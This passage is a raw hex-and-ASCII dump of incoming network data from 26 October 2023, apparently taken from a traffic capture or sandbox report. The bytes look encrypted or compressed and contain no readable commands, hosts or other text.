74 0b b1 27 df 63 c1 f1 02 97 8d 07 d3 2a 65 2c bc 63 3d 9b 94 7a 90 ae d4 ef 30 79 d1 0f c3 d5 43 3a 29 8f 5f 46 40 62 f7 c5 f3 ad 5c 1b c9 b7 78 0a a5 d9 d0 fc
                                      Data Ascii: 42'0qXQH?XuU?y7>jmEkQI\kH!9B|\)qWWAChH{Hb4.x&[}G|U04=R2$VZc1y:'>{iq$(1Ft'c*e,c=z0yC:)_F@b\x
                                      2023-10-26 07:03:21 UTC97INData Raw: 21 42 fb 55 2b 8d 83 5e 48 f5 18 7b 2a 31 11 b7 4b 79 38 98 66 f7 ee da 70 4b d6 97 3f aa 2a f9 d8 9c f2 e8 bf 7a af f0 29 11 74 5b e0 40 31 18 ae 8a bc 23 fa 38 c7 72 2f 7d 6b 46 27 a4 f6 d4 de 12 c4 74 46 b3 2d 74 2f 50 01 15 65 d0 1e 82 d2 1c 3c 01 de 16 40 89 88 8b bb 69 c2 ee fe 35 32 21 5d 79 a9 85 d4 e8 b2 f6 84 13 33 54 51 ac 21 87 5e bc c5 4f c6 e9 3f 27 bc 2a 9a 78 1c 75 36 e2 21 71 81 b8 14 ab d5 0e dd 5b 37 3e 4a 65 78 fb e0 e9 4b f3 6b 0b 8f a5 45 14 7c 0d d2 63 bd f1 49 7d af 1f c9 fe e6 2d 0a 38 65 fa 37 ec 76 bc 23 8a 03 c0 7b 64 05 d4 c8 3a 3e 7d bd a9 71 1f 41 97 47 40 48 13 2f 7a 3b ee 85 91 09 30 ed 60 ab 94 16 ff 62 ca 60 9e bf 80 78 26 a5 a8 c1 7d 00 c2 50 6f 0d 89 0b 6c 26 35 cb f6 f9 eb 19 3c fc 13 ed 52 38 cb bb 5c 5a ce 95 9d bc
                                      Data Ascii: !BU+^H{*1Ky8fpK?*z)t[@1#8r/}kF'tF-t/Pe<@i52!]y3TQ!^O?'*xu6!q[7>JexKkE|cI}-8e7v#{d:>}qAG@H/z;0`b`x&}Pol&5<R8\Z
                                      2023-10-26 07:03:21 UTC98INData Raw: 78 89 9e 5c 70 a5 19 97 8b f3 e9 9e 6f 7f 12 55 cc 41 a1 ec 89 2e d7 5d 65 c7 59 1e 59 c5 c4 2e be 91 a9 7a 56 29 79 8d 78 5c 95 4e 38 bc 76 a7 b8 de 30 5b 8e a0 5d f1 4c bc a2 6f 8f 34 55 9f 8f 5d d6 61 a1 2e 0f ad e8 a4 7a f6 a6 c8 f4 70 b3 9b a2 c6 54 bd ba 63 4f 0b a1 c8 7d b8 61 2e 67 fb 55 d5 81 78 5f 96 ff 19 7b a4 a6 30 8b 5d 79 38 66 9a a1 d7 ba 58 eb d6 69 39 55 24 74 b1 9c f3 e8 bf 7a 08 de 2d 11 74 a5 b4 c8 74 38 a5 8b 42 2d 00 39 00 5e 2e 7d 4b bd 2b a4 f6 d4 de 17 c4 26 5b 84 2d 04 f9 47 00 15 e1 d6 9b 87 d2 16 1c 54 f6 32 41 77 8c 70 b7 6d 3c c2 fb 35 12 22 75 df a8 7b d3 2f 9c f3 84 ce 81 58 53 ac f9 9a a0 b2 b2 52 2c a8 4f 0f a7 3e b0 52 75 d0 36 e2 d5 5f 8d b8 14 55 27 08 d8 7b 37 c0 46 60 86 da db e3 4b f3 95 0a 96 84 45 14 7c 0d d0 69
                                      Data Ascii: x\poUA.]eYY.zV)yx\N8v0[]Lo4U]a.zpTcO}a.gUx_{0]y8fXi9U$tz-tt8B-9^.}K+&[-GT2Awpm<5"u{/XSR,O>Ru6_U'{7F`KE|i
                                      2023-10-26 07:03:21 UTC99INData Raw: 23 3f 12 19 6a cc 84 80 37 f9 00 e4 55 44 53 06 25 a4 f6 5d c5 c1 11 73 55 e0 37 19 05 bf 51 4f 6e d7 04 2d 76 64 19 1d 67 b4 80 04 0a 38 ce 67 6c 25 3a d2 42 70 42 10 0d 36 e5 b4 ff 33 70 c6 d4 27 5a 87 f2 1e 38 e9 1f 9a 00 b6 2f cf 8b 8f e5 e9 ef db e0 cb 07 10 e4 e1 4b 95 be ba e5 4f 89 9e 5c 8e de 66 a0 a3 19 86 02 64 46 0e 27 42 55 81 9a a1 86 d7 a3 61 fb 1e 1e a7 c9 e9 87 9e 9e a3 84 5a d6 78 94 77 5c 95 4e 39 a2 41 a7 c2 9b 8c 4a 8e a6 32 a5 42 b9 a8 91 7f 3a 50 b7 06 54 d6 6b 5f dc 0f 94 de a4 7a f6 58 b6 66 47 4d e7 c9 5a cf 43 b2 0d e5 2b ab c2 83 b6 9c 20 5a f1 55 2b 8d 69 a1 b8 e2 19 a6 d8 5e 31 b2 38 d1 39 66 62 56 d9 be 70 b5 da 6d 33 55 26 74 b1 d3 53 e9 bf 7c 08 de 2d 11 8a 57 bd cd 1b b5 af 8b 44 0d fe 38 39 7e 41 a7 4b 43 2d cb 5b 2b d2
                                      Data Ascii: #?j7UDS%]sU7QOn-vdg8gl%:BpB63p'Z8/KO\fdF'BUaZxw\N9AJ2B:PTk_zXfGMZC+ ZU+i^189fbVpm3U&tS|-WD89~AKC-[+
                                      2023-10-26 07:03:21 UTC100INData Raw: ac 93 ea 5b 47 1d 23 03 d5 28 c3 c1 5d fa 8f 96 ae 49 fc b2 94 8e 8f 59 d9 23 0e e8 38 bc 24 94 a0 21 47 cc a6 20 b2 49 1b 92 87 30 ff dc 3d 23 5c 00 ec 62 c3 96 7e e1 3b 27 05 98 47 48 c7 3f 75 d6 51 fc 3e 8c d5 b8 80 15 6f 4e 29 7d b4 a8 2f 7f ec 1d 8f 42 f5 e0 14 9f de be 3d 91 88 3b 3f 7d c3 e7 89 8e ef 9b 06 0e e2 75 64 51 06 25 cb d2 53 d8 cb 7e 22 58 fd 31 c7 08 a8 51 b1 9c c4 3d be 81 64 19 e9 1c 8f 82 76 27 60 64 17 44 34 c4 de 5f 03 29 1d 1b 30 74 17 ff 33 88 ea d5 27 28 ea aa c4 48 86 b5 f4 ad b1 15 c3 ab 8e e5 fd 11 ba 21 cb da f5 8d 4e 4a 6b b4 93 bb 6e 89 98 a2 80 b4 19 69 af 7c e9 60 69 5e 08 3a 6b 40 81 ec 77 20 ce a3 95 ce 4c 1e 59 c5 d8 2e f1 33 a8 7a 50 f7 78 b4 77 5c fa 94 4b 27 7c c8 1f f5 10 4d ae a2 5d 0f 42 d6 78 6f 71 32 3f 30 ae
                                      Data Ascii: [G#(]IY#8$!G I0=#\b~;'GH?uQ>oN)}/B=;?}udQ%S~"X1Q=dv'`dD4_)0t3'(H!NJkni|`i^:k@w LY.3zPxw\K'|M]Bxoq2?0
                                      2023-10-26 07:03:21 UTC101INData Raw: 99 73 71 a3 55 7b e6 9b 93 5d 8a 38 6c 6f db c9 73 ac 44 fc 3f 4c a6 4c 1f 20 23 0b 5f 98 90 c5 39 b6 6a 98 69 c9 b5 12 c7 87 18 be 37 4a 9d c1 1a 22 5c 1b e1 09 cc 3d 6f 94 1d df 6e 69 17 ea 53 0e 37 0d 5e c5 4c dc 48 91 6b d6 8f 0b 64 56 5f 2c 04 09 31 cf 91 47 03 c0 9c 7e b7 50 2e b7 fc 33 57 4c 17 90 dd 7c 29 c5 e7 a3 f4 9a 96 3f 9f e9 b2 60 ed 33 58 ab 81 3e ea 48 ce 1f f9 7a 51 28 a1 c9 8f b9 61 ed 6d 89 3b 90 5b 25 23 5a fe 1c 7a d4 68 72 09 37 5f a8 b9 57 4e e7 3f 8b d7 68 bd e4 8c d5 4c e3 bd 6e b0 23 5a b4 c7 73 7e 83 cd e0 f4 ff 8f b3 be dc b8 1d 90 e7 8c 3f 12 13 88 31 84 80 3c f9 00 ec 55 44 40 06 25 a4 f6 5d cf c1 11 73 55 ea 37 19 1b bf 51 4f 6e d7 04 aa 70 64 19 1d 62 bb 80 19 fa 0e ce 11 64 3e 3a d2 48 6c 0d 11 0d 3a 74 17 ff 33 88 ea d7
                                      Data Ascii: sqU{]8losD?LL #_9ji7J"\=oniS7^LHkdV_,1G~P.3WL|)?`3X>HzQ(am;[%#Zzhr7_WN?hLn#Zs~?1<UD@%]sU7QOnpdbd>:Hl:t3
                                      2023-10-26 07:03:21 UTC103INData Raw: e6 b6 06 c5 17 72 62 a8 e2 fa c6 1b c4 da ef cc 16 ce 87 18 5b d5 42 69 ff fc 0d 49 8d ab f1 9a d9 0a dd 87 17 ed 11 f2 41 24 fa e7 d2 b3 cc 06 5f 33 e0 eb b2 27 32 94 b6 80 54 b7 cc 7a 10 65 69 80 63 e5 2f 6f f3 7d a1 3f ee fa 2c 0e 4e fd 4b 82 7f 02 17 f2 66 5e 31 1f 17 d6 61 23 ae b9 71 6a a3 55 85 19 a3 b6 1e 8a 38 92 9d df c6 01 84 d0 fd 4f 25 39 4c 1f 2a 1a da 79 67 6f ef 75 1b 6b 98 91 e7 a3 12 c7 79 7b 73 37 6a 8b ae b7 23 a2 1c f8 1f cc 3d 6f db 47 df 6e 63 f5 00 52 0e 30 0d 5e c4 4c dc 49 91 6b d6 8f 0b 64 56 5f 2c 04 09 31 cf 87 47 03 c0 9c 7e b7 76 2e b7 fc ed 5b 47 17 ff 8e 73 2e c3 e7 ac f4 9a 96 ae 4b fe b2 6a 7c 92 4e ab a7 34 e8 48 ce e1 97 99 49 28 ab a6 de b4 77 eb 6d 8b 23 90 f5 55 1c 84 07 1d 8b e3 43 72 f7 3b b6 a6 8e 47 4e 19 33 62
                                      Data Ascii: rb[BiIA$_3'2Tzeic/o}?,NKf^1a#qjU8O%9L*ygouky{s7j#=oGncR0^LIkdV_,1G~v.[Gs.Kj|N4HI(wm#UCr;GN3b
                                      2023-10-26 07:03:21 UTC104INData Raw: 47 26 d1 76 28 07 df 48 6f 66 14 49 bb af a7 4b ef c6 01 67 ca 49 ae 61 3a d2 74 7e 75 b2 8c 25 ed 48 89 e9 9f 31 18 a8 7e 76 15 4e bf cd 10 75 e6 79 cb b3 9a 7d c7 15 75 21 6f 05 3f 08 f1 30 c7 41 f0 17 5a 0b 5b 85 9e 11 5a c0 06 de b8 bc 9c 32 53 44 06 1e 50 f4 46 e9 81 12 f1 9d 53 e6 d9 b1 c5 78 a2 0d 10 e8 95 61 e4 ca d6 cf ee 05 ce 87 77 7f db 55 63 90 ad 00 5e 8b 75 ea 96 d9 f4 2f 8a 2e 01 1d f1 41 24 fa e6 d2 a2 7b 06 5f 35 3e f3 bf 27 cc 66 bd 97 aa bb 3b 76 2f ee 49 84 69 8a 88 90 f2 42 51 31 e0 fa ea 90 40 fd 24 0f 7b 02 11 d2 98 50 26 1f 78 f2 6d 34 a4 f6 fe 6b a3 53 5b 19 9a aa 1e e5 e2 6c 91 dd a9 de c2 e9 fb 1f 4b 86 4c 1f 4f
                                      Data Ascii: G&v(HofIKgIa:t~u%H1~vNuy}u!o?0AZ[Z2SDPFSxawUc^u/.A${_5>'f;v/IiBQ1@${P&xm4kS[lKLO
                                      2023-10-26 07:03:21 UTC104INData Raw: f9 64 85 92 ff 60 57 1b 6d 66 61 e6 b4 32 47 87 77 64 ba 0f 97 ae b6 dd 52 0d c1 f6 c0 33 6f 94 6a de 6e 65 58 45 52 0e 31 9c 8a d5 4c f6 3b 3c 6a d6 77 25 71 56 5f d2 67 c4 31 ef 83 28 ac c1 62 79 00 0d 0e 37 fc cd 5b 79 2d ff 70 7d d7 cf c9 a3 9b 37 97 50 43 c9 b2 6a 82 9e 36 71 87 1e e2 27 63 1e 96 a6 71 2a ab a6 20 d7 bb eb 93 8d 59 3f 7a 3c 25 a4 f2 f2 74 e3 e8 72 f7 3b 60 80 98 47 44 df 14 75 d6 51 6d e8 82 d5 dd 42 b9 6e 48 0f 5d b4 a8 2f 10 59 c7 8f 48 90 22 b8 9e d8 98 1f 90 88 3b 50 c8 19 e7 83 eb 2f 37 07 08 1a 5b 74 51 f8 29 b4 08 ad d4 c2 11 73 55 f2 37 11 b3 be 51 49 6e d8 2c 96 8e 68 1e e3 1c f3 b9 76 27 60 71 17 44 34 03 ce 48 03 d7 39 38 30 1b b0 00 3f 9f ca ba 8d 28 ea cf 36 16 87 bf 91 fe be 07 c5 b3 98 e5 fd 11 2b f7 da da 8d 53 d9 4b
                                      Data Ascii: d`Wmfa2GwdR3ojneXER1L;<jw%qV_g1(by7[y-p}7PCj6q'cq* Y?z<%tr;`GDuQmBnH]/YH";P/7[tQ)sU7QIn,hv'`qD4H980?(6+SK
                                      2023-10-26 07:03:21 UTC105INData Raw: 00 5e ad 88 e4 9a d9 f4 22 bf 32 ff 11 f2 bf d6 f6 ed f2 8b ce 07 5f cd c9 fd b2 0f 46 6b b8 91 f6 97 36 76 07 65 b7 8a 62 e5 2f 6f fe 45 af 1f ee fa 14 9c b0 fc 72 a8 7a 02 17 f2 b8 51 26 1f 17 d6 63 35 ae 99 ad 66 a2 55 5b 12 9a aa 1e 74 39 55 94 d7 c6 73 fb ec fd 3f 4a be 06 e1 df dc 9a 89 98 90 e7 49 1b 6b 92 45 e9 b4 01 f7 84 77 53 34 4a 97 ab b7 23 4d 3d c1 08 cc 3d 91 f5 c6 df 56 79 7b 45 52 0e cf ff 51 d5 6c f9 54 91 6b 28 70 3c 64 56 5f d2 f6 17 31 ef a1 29 02 c0 64 45 bb 66 2e b7 dc cb 5b 47 17 01 7e 7c 29 c3 39 af f5 9a b6 42 45 e9 b2 94 83 a7 41 ab 87 1e 16 44 ce 1f b6 a8 51 28 ab d4 63 82 61 9b 31 a7 25 90 7b 3c dd 54 ff e2 74 3d 64 73 f7 1b 4c a8 99 47 b0 e6 06 62 d6 51 93 1a 85 d5 b2 91 45 6e 4e 25 75 c7 a9 2f 79 a3 c2 8f 42 ff 71 b7 9f de
                                      Data Ascii: ^"2_Fk6veb/oErzQ&c5fU[t9Us?JIkEwS4J#M==Vy{ERQlTk(p<dV_1)dEf.[G~|)9BEADQ(ca1%{<Tt=dsLGbQEnN%u/yBq
                                      2023-10-26 07:03:21 UTC107INData Raw: 78 81 79 98 8f 4a 40 49 77 ee 86 26 18 a8 7e e7 c6 4e bf ef 0d d9 e7 7f f7 31 64 82 38 35 1e fb 6f 05 cb 69 5d 31 c7 b9 dc 17 5a 2b 5b ea 44 11 a4 cb 50 7b b9 bc 9a cc 7d 4e 06 e0 5c 00 48 87 2c 13 0f 97 72 e6 f9 b8 c5 17 78 f3 11 db ff cc e5 ca e8 ea ec 05 ce bf 92 5b 24 aa 1b 6d 10 01 2e ff 3e de 9a a9 2a 27 86 2e ff 9c c7 41 da f7 13 dc 8a ce f9 53 33 c0 dd b2 27 32 6a ca 9f 52 b7 42 88 0e 65 49 ac 0d e4 2f 97 80 4c a9 3f 9e d2 26 9c 4e f7 e9 5c 76 02 17 d2 99 50 26 1f 65 20 6b 34 de 67 5a 6a a3 7d 0f 19 9a ac 6c 82 3e 6c e1 ff f4 73 c3 e3 5f c1 46 86 4c 3f 22 23 64 85 ea 98 c9 56 6b 95 91 6f e9 9c 62 c6 87 71 4c 51 4b 97 a4 c5 2b 5a 1d b1 20 fe 3d 6f f1 65 21 62 63 78 65 51 0e 31 f3 22 dd 4a fc 24 6f 62 d6 71 2d 01 57 5f d4 20 78 30 ef 83 35 0b c6 62
                                      Data Ascii: xyJ@Iw&~N1d85oi]1Z+[DP{}N\H,rx[$m.>*'.AS3'2jRBeI/L?&N\vP&e k4gZj}l>ls_FL?"#dVkobqLQK+Z =oe!bcxeQ1"J$obq-W_ x05b
                                      2023-10-26 07:03:21 UTC108INData Raw: 29 5b 98 a8 ba 7d 80 4f ca fd 4c 64 af 41 a5 de 22 30 30 e8 3c e8 71 fb 51 0e 04 10 25 d8 a5 c8 e9 6c dc fa 50 12 5f 1b 9e fa 2a f8 ae 41 14 1a 50 8f 3f ca 31 c1 4e a9 94 13 0a 89 47 75 31 8b 14 8d 3d c1 28 00 a1 d3 76 2c 8b b4 73 6f e8 66 fa bb 87 28 39 98 f2 6e b0 e3 52 a8 9f 3e aa 86 82 79 c8 a4 79 40 49 83 9c c3 30 18 ae 11 71 ce 4e b5 e7 61 d8 e7 79 33 9d 9b 7d c7 eb 16 fb 6f 25 16 67 5c 31 39 46 e9 20 5a 0b 5b 94 f9 11 5a ce 1b ea 87 bc ea b2 e6 4f 06 e4 2e 57 78 86 5c 3b ea 9b 73 ec ab 43 c7 17 08 25 23 e2 fa c6 96 b6 d1 ef ea 6a a6 86 18 af fb 71 69 ff 02 ff 50 8d 8b e4 64 d5 0a 23 a6 31 ff 11 f2 bf db cf db d2 8a ce 79 e2 33 c0 f9 c0 ec 0c 6a c8 e9 ef b7 32 72 75 86 77 84 13 cd 34 91 f2 4e dd cd ec fa 64 b4 7d fd 4b a8 09 7e 16 f2 9e 3f 4e 1e 17
                                      Data Ascii: )[}OLdA"00<qQ%lP_*AP?1NGu1=(v,sof(9nR>yy@I0qNay3}o%g\19F Z[ZO.Wx\;sC%#jqiPd#1y3j2ruw4Nd}K~?N
                                      2023-10-26 07:03:21 UTC109INData Raw: 79 84 a5 75 66 31 1f e4 2b 92 22 46 99 b6 03 9e 49 b9 90 60 9f b1 74 5c 08 02 d5 f0 31 e9 9d 33 f3 ae df 52 6d 07 a8 3a 62 5c 7b 65 d7 7c b7 69 4e 97 3c f5 5e 8c 0a 40 eb f3 b9 d3 c8 19 ab 00 5b 2c 95 40 7c 24 0e 22 4e c0 ab e7 af 8b a4 31 cb d2 a4 fd bf 3b a8 c1 fa 34 d3 98 d0 8d 12 10 6d 9c da 91 3d 3c 3f b4 42 3e 9b e9 33 ea 9e 98 40 18 f7 4e e3 38 89 d3 24 35 60 0d e1 d7 3a e1 1f d0 d3 63 14 30 79 ec 86 21 d8 b7 2e 7c 1b ae 8b 1f c0 31 3f 42 57 9a 33 17 89 b9 79 cf 8a 0d b3 3d c1 28 80 1d ea 40 28 f9 d3 33 d3 98 18 45 c9 ac 6f 4b 9f b2 d4 c0 cb 4d da a6 77 d8 04 a8 48 b8 8c 40 32 bb 8b ef cf 19 2b a8 7e 13 bc 32 be c7 79 b7 8f 78 cd 99 bb 74 c7 15 1a 05 61 05 35 67 a2 3d c7 47 f0 37 5a 0b 5b 14 45 28 6c ca 69 71 c7 01 9a cc 59 3d 5d a3 5c 8e 38 3d 2c
                                      Data Ascii: yuf1+"FI`t\13Rm:b\{e|iN<^@[,@|$"N1;4m=<?B>3@N8$5`:c0y!.|1?BW3y=(@(3EoKMwH@2+~2yxta5g=G7Z[E(liqY=]\8=,
                                      2023-10-26 07:03:21 UTC110INData Raw: 4d bb 1a cb 29 62 33 bf 48 37 45 82 54 44 18 ba c0 c2 fe c3 dd 5c 32 cd 43 5e c8 0b 65 01 59 7b 68 bd 74 8d 44 4c 4a bb c0 5c 77 c3 9e e4 bb 4b 0a 1b 42 48 57 23 54 5e 8c e1 b7 63 1e cc b4 20 71 d9 46 75 50 28 d7 b8 3a 38 1c 7e 60 09 44 da d6 90 83 47 3c 1e a3 87 40 42 26 5d 87 01 28 7d 84 af 55 7b af e0 1b 2a b6 22 46 99 5b 3f 9b 49 0e 9f 60 9f b4 8a 5d 20 14 d5 f0 31 97 df 3d f2 aa 95 62 2f 07 d8 44 26 50 7a 61 85 b2 f5 69 3e 41 0c cc 1f 86 78 b2 17 fa c9 fb 05 10 aa 0a 08 51 94 40 7a c6 53 23 4e cb 75 f9 af 8b 5a c3 c5 d2 84 fd 41 37 a8 e9 02 3d d3 92 72 8d 1f 29 5b bc da 91 43 80 50 6d 46 4c 6e 83 bf 9b e0 24 60 1a f3 3c e8 85 87 a2 0c 04 9e 01 ea a5 e8 e3 1f a0 fb ae 15 09 79 9f fa 20 d8 91 40 14 1a ae 7f 31 cb 31 3f bc a5 95 33 37 8b 47 75 cf 74 2c
                                      Data Ascii: M)b3H7ETD\2C^eY{htDLJ\wKBHW#T^c qFuP(:8~`DG<@B&](}U{*"F[?I`] 1=b/D&Pzai>AxQ@zS#NuZA7=r)[CPmFLn$`<y @11?37Gut,
                                      2023-10-26 07:03:21 UTC111INData Raw: 0f b3 8c 74 0a e6 ac a2 1c 4a 92 f1 3c e2 51 10 c1 22 f0 44 19 4e f5 21 de 06 19 9d 9f f3 39 9c de 25 32 9e 82 ee 7f 3d 49 0f 3c 55 e3 38 ef 03 28 52 d3 5e 43 e5 ae 9f fb 8b d1 2f aa f4 19 81 ec a9 36 97 db a2 e3 59 a6 f1 3b 98 ed 54 33 8f b7 1c 87 b6 46 d7 07 8d 5f 74 5f 5e 87 3f 32 4d 98 77 cc 29 f9 31 41 44 46 45 a2 44 46 30 a9 3e c3 cd ab a9 5d 32 39 40 5c bb 80 6d 00 53 7b 3a bc 74 81 6f e8 3d ba c6 76 06 b4 9f e4 4f 4e 1c 17 45 d9 23 22 54 74 e3 ff b6 63 ea a4 80 01 61 df 41 1a 09 28 d7 b2 55 bc 13 7e 6a 01 ad 8e da 98 aa 77 d0 c0 a9 7e 6d 7d 24 32 a0 01 10 72 58 ad 53 2c 4a 1e e4 df 8a 38 50 b1 db 0e 9e 4f b1 e3 61 9f bb f8 f9 21 34 a5 82 0a 95 21 43 9c cd ad e1 25 14 dc 46 de 33 00 60 a5 b9 ef 73 28 97 9e f4 5e 80 50 ce e8 f3 c3 89 5f 09 ab 7a 5a
                                      Data Ascii: tJ<Q"DN!9%2=I<U8(R^C/6Y;T3F_t_^?2Mw)1ADFEDF0>]29@\mS{:to=vONE#"TtcaA(U~jw~m}$2rXS,J8POa!4!C%F3`s(^P_zZ
                                      2023-10-26 07:03:21 UTC113INData Raw: 48 3a 09 85 a1 47 79 99 f6 fc e1 95 59 1b 37 bb 40 c2 73 a7 2e 02 1d 4d b7 14 c6 f1 1d 89 74 7c 62 c7 6e be 2e a9 a2 2b db b5 44 0f ab 27 bd aa 71 da c9 c6 2f 88 0f 85 d7 85 45 4b 3d 11 04 cb 6b f2 80 1c 83 c5 8a cb aa 60 16 9e d2 6f c0 20 67 00 68 0f fd eb 56 8a 82 26 a4 aa 60 a0 38 04 b3 21 20 0a e6 ad a2 13 73 8a d1 3e e2 af 1c 3b 2c 0d 48 1a b0 77 4b e1 d5 e7 62 60 d3 d5 9d e7 34 cc 90 8a 10 76 c1 45 f9 32 77 e3 18 eb 03 d6 53 14 5a 40 e5 ae 61 d7 89 d1 0f ae 0a 17 89 12 a8 f1 95 d3 a2 c3 73 62 0f c4 99 cc 68 36 8f b7 e2 b1 b0 46 d7 f9 b9 3e 88 80 a3 ad 3f 32 b3 82 7e d9 29 62 33 61 44 37 45 a2 ab 4a 19 ba 1e c0 c7 d8 dd a2 3c 30 4a 5e 36 f9 6f 00 79 53 aa bd 74 79 6d f9 41 bb c6 7c 75 e3 9f e4 45 45 f4 15 41 b6 5b dd 58 7d 8c c1 bc 63 e0 cd 73 2b 48
                                      Data Ascii: H:GyY7@s.Mt|bn.+D'q/EK=k`o ghV&`8! s>;,HwKb`4vE2wSZ@asbh6F>?2~)b3aD7EJ<0J^6oyStymA|uEEA[X}cs+H
                                      2023-10-26 07:03:21 UTC114INData Raw: 6e 26 34 d0 38 ff d2 bb 3d fc 13 ab 5a 38 da 9b d1 1f ce 95 62 4c d1 3f 3f 55 0e b4 1c 36 d5 1f cc d7 d3 05 82 18 99 e8 dc 0c 91 3e 57 aa f5 3e 8b 97 96 5f f7 3b 72 04 ab b6 d6 3f 59 b4 d3 8a 07 43 2b ff 63 e1 f1 02 69 8c c0 d0 2a 65 57 7f 43 3c 9f 6a 73 6f a0 49 cf 4f 87 dd 03 9c 27 d7 c4 25 8f a1 67 79 67 f7 c5 db 13 58 1b c3 9d 60 ca 5b 26 2f fc 19 65 bc 14 38 fd eb 87 57 7f 62 39 62 43 2f b0 b1 2b db b5 44 07 90 3c 43 a3 70 24 9c 38 21 77 03 a4 d3 7b 4c 4a c3 e1 00 c9 6b 9d 10 34 85 e5 8f cb 54 6e eb 9f eb b4 cc 23 67 de 65 0e fd cb a8 8b bb 30 5a ab 9e 52 30 07 93 a5 65 0a e6 52 5e 7d 4a ed 0e c3 1d 8f 1a c5 22 0e b6 14 46 7b 48 1f f9 ec 62 40 d2 2b 9c de db cd a9 9d ee 7f c3 bb 0e 3e 75 c3 39 ef 03 d6 0b 14 5f 41 e5 8e 9d db 8a d1 d1 a4 02 17 89 12
                                      Data Ascii: n&48=Z8bL??U6>W>_;r?YC+ci*eWC<jsoIO'%gygX`[&/e8Wb9bC/+D<Cp$8!w{LJk4Tn#ge0ZR0eR^}J"F{Hb@+>u9_A
                                      2023-10-26 07:03:21 UTC115INData Raw: 22 85 3b 3e 4a 0a 20 fa d9 e9 61 f3 78 3b ac a4 ac 14 7c f3 dd 6b bd e0 97 71 a7 1f e9 06 e8 2d 0a fe dd c3 32 ec 76 42 17 8f 03 e0 79 5c db 29 c9 c4 f9 7a b8 a9 5b 0b 6b b7 45 68 48 13 d1 74 31 ef a3 5f 04 3b ec 40 aa 95 14 ff 79 cb 30 cd be a0 78 d8 ac a9 c1 83 c4 c3 47 f0 c5 82 0a 68 a8 5d ef dc fe eb ac 1d fe 13 8b 52 c6 d4 9b 5c 5a 30 99 63 b2 ff 3c 3f 75 0d 4a 1d 0f 06 11 c4 d7 2d f2 8c 10 67 c1 db 0c ea f7 a9 ab c8 85 82 96 96 2e a3 3a 72 26 d1 65 d6 3f 1d c8 ba b5 46 bd 27 ff 77 eb d1 06 69 8c 3e 27 24 65 2c bc bd 30 9b 94 5a 6e a0 d8 ef ce 86 e4 09 c3 f5 4b 3a 09 8e a1 47 79 99 f9 c5 f3 95 a7 17 c9 b7 60 c6 5b 26 2f fc 16 54 b9 14 c6 f1 db 82 77 7c 62 01 20 42 d1 76 59 22 db b5 c1 c7 92 3c b9 54 78 25 c5 49 77 76 03 86 ac a8 4c 4a 39 11 01 cb 6b
                                      Data Ascii: ";>J ax;|kq-2vBy\)z[kEhHt1_;@y0xGh]R\Z0c<?uJ-g.:r&e?F'wi>'$e,0ZnK:Gy`[&/Tw|b BvY"<Tx%IwvLJ9k
                                      2023-10-26 07:03:21 UTC116INData Raw: 5b b8 cd 8a 14 a0 8b 62 22 fe 38 39 80 2f 44 50 43 27 a4 08 23 d2 16 3a 58 42 b3 44 5c 4c 5d 00 13 15 b7 3b 87 f2 0c 3c 58 f6 cc 4f 87 82 75 49 61 cc ce de 18 32 21 75 21 a9 bc f9 16 bc f3 7a c7 7f 54 2a 68 07 93 a4 c1 43 4e 1b a2 1f 26 bc 3e b0 2b 9e 74 36 e8 f7 fa 88 b8 1e 6f 89 00 dd 7b 17 10 4a 65 86 04 d7 ed 4b f3 95 07 a1 a4 65 32 7c f3 dc 95 bc c8 e8 71 a7 1f 17 f1 e6 2d 71 0e 64 c3 36 12 7a bd 1b 71 0f c3 7b 04 54 7e 37 c5 c2 59 11 a9 5b 15 bf 9e 46 68 33 d0 2f 7a 35 11 af a5 08 48 6f 61 ab 9f ea f3 80 ca 7a 57 bf a0 72 0e 2d a9 c1 77 e5 4a 46 8b 06 7c 06 64 26 14 d0 c6 fe eb 3a 54 93 9d 8b 52 32 a7 56 5c 5a ca b5 44 b2 df 3f c1 7b 03 b4 1c c8 27 1f c4 f7 ce fb 8e 10 67 c9 e2 2c 91 3e a9 55 c5 7b 8b 69 9a a9 fb c4 7e 2d aa 20 fe a1 18 46 d5 b3 b5
                                      Data Ascii: [b"89/DPC'#:XBD\L];<XOuIa2!u!zT*hCN&>+t6o{JeKe2|q-qd6zq{T~7Y[Fh3/z5HoazWr-wJF|d&:TR2V\ZD?{'g,>U{i~- F
                                      2023-10-26 07:03:21 UTC118INData Raw: 4e 4b 27 48 9b ba f4 10 6b ab a0 5d 0f bc b7 ac 6f 71 c6 5c 91 af 74 ef 61 a1 d0 f0 95 c7 8f 7a f6 58 3a fe 70 4d ec 62 c6 ce 47 c7 e1 4e 2b a1 e8 7f b8 9f 20 11 7f 54 2b 87 55 da b7 f9 13 41 88 a5 ce 4d 6b 43 38 66 64 56 d9 b4 70 4b 28 65 3d ab 0a 35 b1 bc f4 16 be 43 a7 d0 28 11 8a 52 b8 cd 8a 11 af 8b 31 ae ff 38 33 5e 2d 7d 4b 43 54 20 f7 2a d8 3e 4c 55 46 b9 05 fd d0 5c 0a 35 e9 b9 3e 87 fa 8b 3d 58 f0 41 c2 88 82 7f 97 6c c2 ce fe 46 b6 20 75 d5 80 0e d3 16 b6 db 08 cf 7f 5e af a2 0d 93 80 f1 c0 4f 1b 56 31 29 bc 3e 4e 54 14 75 16 c1 df 7f 89 46 15 6c ce 06 dd 7b c9 32 43 65 a6 fb d9 e3 4b ab 95 05 a6 a4 65 30 7c f3 dc 95 b3 ff b7 71 59 13 e7 f8 c6 32 0a c6 64 3d 33 d5 78 bc 1b 8f 3b 13 84 a3 24 09 17 c5 c0 71 46 a7 55 1f 41 69 4a 66 48 33 35 7a 31
                                      Data Ascii: NK'Hk]oq\tazX:pMbGN+ T+UAMkC8fdVpK(e=5C(R183^-}KCT *>LUF\5>=XAlF u^OV1)>NTuFl{2CeKe0|qY2d=3x;$qFUAiJfH35z1
